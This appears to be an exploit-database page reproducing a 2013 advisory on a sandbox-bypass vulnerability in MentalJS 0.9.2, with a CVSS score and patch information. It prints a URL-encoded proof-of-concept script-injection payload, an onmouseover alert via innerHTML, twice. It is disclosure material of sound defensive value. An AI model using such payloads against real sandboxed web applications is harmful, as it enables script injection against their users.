header-logo
Suggest Exploit
vendor:
MentalJS
by:
SecurityFocus
7,5
CVSS
HIGH
Security-Bypass
264
CWE
Product Name: MentalJS
Affected Version From: 0.9.2
Affected Version To: 0.9.2
Patch Exists: Yes
Related CWE: N/A
CPE: MentalJS
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

MentalJS Security-Bypass Vulnerability

MentalJS is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. An example of the exploit is http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E

Mitigation:

Users should apply the latest available updates to mitigate the risk of exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/62581/info

MentalJS is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. 

http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E

Navigation

Suggest Exploit

Services By CQR